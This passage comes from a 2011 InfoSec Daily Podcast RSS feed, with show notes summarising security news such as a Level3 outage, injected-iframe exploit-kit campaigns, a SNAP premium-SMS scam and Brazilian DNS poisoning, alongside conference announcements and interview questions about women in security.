<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://threatpost.com/en_us/blogs/level3-outage-causing-major-internet-issues-110711"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/level3-outage-causing-major-internet-issues-110711</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There were widespread Internet outages and slowdowns on Monday after backbone provider Level3 Communications had a major outage, affecting some downstream providers and enterprises. The company says that the problem stemmed from a software issue with some of its routers.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A source with knowledge of the incident told Threatpost that L3 is still investigating the outages, which began at around 14:00 GMT. The company still isn&#39;t sure what is causing the outage, but initial speculation points to an issue with routers by Juniper and operated by L3 that began mysteriously crashing and causing cascading problems on the L3 backbone. The company&#39;s investigators aren&#39;t sure of the cause of the crashes, which could be due to a bad software update or, potentially, to attacks. However, the source said that L3 has no evidence, as yet, that attacks on the Juniper routers are the cause of the crashes.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Shortly after 9 a.m. ET today, our network experienced temporary service interruptions across North America and Europe apparently due to a router manufacturer software issue. It has been reported that a similar issue may have affected other carriers as well. Our technicians worked quickly to address the issue and service is now fully restored,&quot; a statement from L3 said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many users on Twitter and elsewhere were reporting issues with their Juniper routers crashing and rebooting off and on Monday morning, and some of the speculation centered on a problem with a BGP update. There also were reports of widespread problems with Time Warner Cable&#39;s connectivity on Monday.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2011/11/07/not-such-a-nice-hack-nice-pack/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/11/07/not-such-a-nice-hack-nice-pack/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the most prevalent scripts used to compromise legitimate web sites over the past few months is something Sophos&#39;s products block as Mal/Iframe-W.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The threat name describes the payload &#8211; an iframe, injected into otherwise-innocent web pages, to load content from a remote site. In this article, I will elaborate a little more on the threat, and how it is being used to infect users.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The JavaScript that is injected into legitimate sites is heavily obfuscated. Depending upon exactly how the site has been hacked, the script may be injected anywhere within the page. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The script obfuscation uses a variety of anti-emulation tricks, in an attempt to evade generic detection, and break automated analysis systems.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Websites all over the world have been hit in these site defacements. Last week, their victims included the French site of a global car manufacturer. (</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following our notification to them, the site has now been cleaned up.</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Historically, Mal/Iframe-W has been use to drive traffic to Blackhole exploit sites in order to infect users with a variety of payloads.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the last couple of weeks however, I have seen Mal/Iframe-W being used to send traffic to a different</span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">exploit kit &#8211; one known as &#39;Nice Pack&#39;. The attack is being used to infect users with a threat called </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">ZeroAccess</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a nasty rootkit.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://sunbeltblog.blogspot.com/2011/11/snap-scam-will-make-you-snap.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://sunbeltblog.blogspot.com/2011/11/snap-scam-will-make-you-snap.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s no real surprise when we see how scammers ply their tricks online in order to dupe practically anyone. They leave no room for distinction with regard to who they target. And why would they? When it comes to online fraud, everyone is a cash cow, even those with little to live off of.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our AV Labs took a closer look at the website, snap(dash)help(dot)com/step/go/1/0, that is posing as the domain for Supplemental Nutrition Assistance Program (S.N.A.P.), otherwise known as the Food Stamp Program. It&#39;s a &quot;federal-assistance program that provides assistance to low- and no-income people and families living in the U.S. Though the program is administered by the U.S. Department of Agriculture, benefits are distributed by the individual U.S. states.&quot; Here&#39;s an</span><a href="http://en.wikipedia.org/wiki/Supplemental_Nutrition_Assistance_Program"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> overview in Wikipedia</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When Internet users enter a ZIP code in the field provided, they are directed to a page where they can register their details. After this, they are taken to another page, asking for their mobile numbers.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users who give out their mobile numbers will be subscribed to a premium SMS service. Should users have skipped entering their details in the registration page, they are then led to this page, which persists on asking for their mobile numbers and one can only wonder why this is without informing users why they have to enter this detail or how it will be used.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The entity responsible or the cellphone scam ad is gtoffers(dot)com&mdash;GameTheory, LLC, the same folks behind Social Ribbons and OpenInstall,&quot; said Eric Howes, Security Product Manager at GFI. &quot;GameTheory, LLC is the company responsible for the blitz of Zugo&mdash;installing Zombie Me / Vampire Me / Make My Baby ads on Facebook&#8230;until Matt Cutts exposed the operation.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An insightful exchange regarding the relationships of the above-mentioned companies can also be read and followed in that expos&eacute;.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is not the first time something like this happened and who knows how many more are out there. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-516-dns-poisoning-e-1-server-glitch-l3-nice-pack-s-n-a-p/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3089/0/infosec-daily-podcast-episode-516.mp3" length="17726420" type="audio/mpeg" />
		<itunes:duration>0:36:53</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 516 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Varun Sharma.
	Announcements:
	Brad Smith theNurse and his stroke at Hacker Halted:
	We all know and love[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 516 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Varun Sharma.
	Announcements:
	Brad Smith theNurse and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.thetechherald.com/article.php/201145/7815/Insider-arrested-after-DNS-poisoning-attack-targets-Brazilian-ISPs
	A 27-year-old employee of a medium-sized ISP in the southern part of Brazil has been arrested, after a DNS cache poisoning attack spread across the country and pointed millions of users to a Trojan aimed at capturing banking and other credentials.
	Last week, millions of Brazilians had their internet connections hijacked, prompting them to install malicious software, after visiting popular destinations such as Hotmail, GMail, YouTube, and local portals Uol, Terra, and Globo.
	Kaspersky&#8217;s Fabio Assolini reported on the attacks, and noted that users were being told to install a banking Trojan, disguised as a security program called Google Defense.
	&#8220;Last week Brazil&#8217;s web forums were alive with desperate cries for help from users who faced malicious redirections when trying to access websites such as YouTube, Gmail and Hotmail, as well as local market leaders including Uol, Terra and Globo,&#8221; he said.
	&#8220;[Redirected users were asked] to download and install the so-called &#8220;Google Defence&#8221; software required to use the search engine. In reality, though, this file is a Trojan banker detected by Kaspersky&#8217;s heuristic engine. Research into this IP highlighted several malicious files and exploits hosted there.&#8221;
	As mentioned, Brazil&#8217;s Federal Police arrested an employee of a medium-sized ISP in the southern part of the country. It&#8217;s understood that for about ten months, he used his access to alter his employer&#8217;s DNS cache, which in turn forced its customers to the malicious server handing out the banking malware.
	Kaspersky suspects that similar internal compromises are happening across Brazil.
	In related news, businesses across the country were reporting that their networking equipment, such as modems and routers, were remotely compromised and had their DNS settings changed in order to join the attack.
	Corporate users were redirected to the malicious server and told to install a Java applet, which in fact was another variant of the banking Trojan.
	Source: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&#38;revision=33633
	If you are running Ruby for any reason at all (Metasploit perhaps?), it&#8217;s time to pull down the latest revision. &#160;There&#8217;s a nasty bug in the encryption that was introduced back in September 2011. &#160;If you are running 1.9.3 or earlier, you are probably safe.
	* e[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 515 &#8211; Weekend Wrap-up with Dr. B0n3z</title>
		<link>http://www.isdpodcast.com/episode-515-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-515-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 06 Nov 2011 02:09:09 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3087</guid>
		<description><![CDATA[&#160; InfoSec Daily Podcast Episode 515 for November 5, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik. Guests: Aricon, Edison Carter, Warrax, Hackett, Armytrained, and babye_doll Announcements: BSides Delaware When: November 11-12, 2011 Where: Wilmington University, Delaware Campus http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010 SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials When: Starts November 30, 2011 [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent; "><span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 515 for November 5, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.</span></p>
<p>	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Guests: Aricon, Edison Carter, Warrax, Hackett, Armytrained, and babye_doll</span></p>
<p>	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Announcements:</span><br />
	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">BSides Delaware</span><br />
	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: November 11-12, 2011</span><br />
	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: Starts November 30, 2011</span><br />
	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Atlanta, GA</span><br />
	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>
	<span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Interview Questions:</span></p>
<p>	<span style="font-size: 10pt; font-family: 'Droid Sans'; color: rgb(32, 32, 32); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">1. What area of security is the most interesting? (Nathaniel)</span></p>
<p>	<span style="font-size: 10pt; font-family: 'Droid Sans'; color: rgb(32, 32, 32); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2. How have you not been scared off by the sheer grossness of your twitter feed? (Nathaniel)</span></p>
<p>	<span style="font-size: 10pt; font-family: 'Droid Sans'; color: rgb(32, 32, 32); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">3. </span><span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">How do you feel about all the cock jokes in infosec? (Boris)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">4. How do you handle the rampant male dominated culture? (Bill)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">5. How do we build a more welcoming community for women? (Bill)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">6. &nbsp;Do you think there is a glass celling in InfoSec or are there too few women in the field at this point to tell? (Bill)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">7. Are women being paid less than men to do the same work in InforSec as far as you can tell? (Bill)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">8. Do you know many female CISSPs? (Bill)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">9. Do you think there are still obstacles for women in this industry, or if the reason for low female count is the same as in Science &amp; Engineering &#8211; lack of interest and/or awareness. (Adrian)</span></p>
<p>
	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">10. How much longer do you have in your master program and do you find what you are learning to be leveragable and applicable &nbsp;knowledge&#8230; or do you feel like a great deal of it only applies in an academic vaccum? (Them)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">11. So I have 2 lil girls how do I get them interested in Info Sec? (securitymoey)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">12. Is there women&#39;s behaviour that you think damage women from getting or being in Info Sec? (securitymoey)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">13. Do you find that us asking you, as a woman, questions about being a woman, over and over, is valuable? (them)</span></p>
<p>	<span style="font-size: 10pt; font-family: Arial; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">14. WHICH school did you choose and why? (them)</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-515-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3087/0/infosec-daily-podcast-episode-515.mp3" length="11595126" type="audio/mpeg" />
		<itunes:duration>0:48:19</itunes:duration>
		<itunes:subtitle>&#160;
InfoSec Daily Podcast Episode 515 for November 5, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.
	Guests: Aricon, Edison Carter, Warrax, Hackett, Armytrained, and babye_doll
	Announcements:
	BSides Delaware
	Whe[...]</itunes:subtitle>
		<itunes:summary>&#160;
InfoSec Daily Podcast Episode 515 for November 5, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.
	Guests: Aricon, Edison Carter, Warrax, Hackett, Armytrained, and babye_doll
	Announcements:
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.

	Interview Questions:
	1. What area of security is the most interesting? (Nathaniel)
	2. How have you not been scared off by the sheer grossness of your twitter feed? (Nathaniel)
	3. How do you feel about all the cock jokes in infosec? (Boris)
	4. How do you handle the rampant male dominated culture? (Bill)
	5. How do we build a more welcoming community for women? (Bill)
	6. &#160;Do you think there is a glass celling in InfoSec or are there too few women in the field at this point to tell? (Bill)
	7. Are women being paid less than men to do the same work in InforSec as far as you can tell? (Bill)
	8. Do you know many female CISSPs? (Bill)
	9. Do you think there are still obstacles for women in this industry, or if the reason for low female count is the same as in Science &#38; Engineering &#8211; lack of interest and/or awareness. (Adrian)

	10. How much longer do you have in your master program and do you find what you are learning to be leveragable and applicable &#160;knowledge&#8230; or do you feel like a great deal of it only applies in an academic vaccum? (Them)
	11. So I have 2 lil girls how do I get them interested in Info Sec? (securitymoey)
	12. Is there women&#39;s behaviour that you think damage women from getting or being in Info Sec? (securitymoey)
	13. Do you find that us asking you, as a woman, questions about being a woman, over and over, is valuable? (them)
	14. WHICH school did you choose and why? (them)</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 514 &#8211; d33ds, Duqu Fix, Hire Hacker, Pirate Bay &amp; CIA</title>
		<link>http://www.isdpodcast.com/episode-514-d33ds-duqu-fix-hire-hacker-pirate-bay-cia</link>
		<comments>http://www.isdpodcast.com/episode-514-d33ds-duqu-fix-hire-hacker-pirate-bay-cia#comments</comments>
		<pubDate>Sat, 05 Nov 2011 00:47:32 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3081</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 514 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez. Announcements: Brad Smith &#34;theNurse&#34; and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 514 for November 4, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith &quot;theNurse&quot; and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br />
	</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
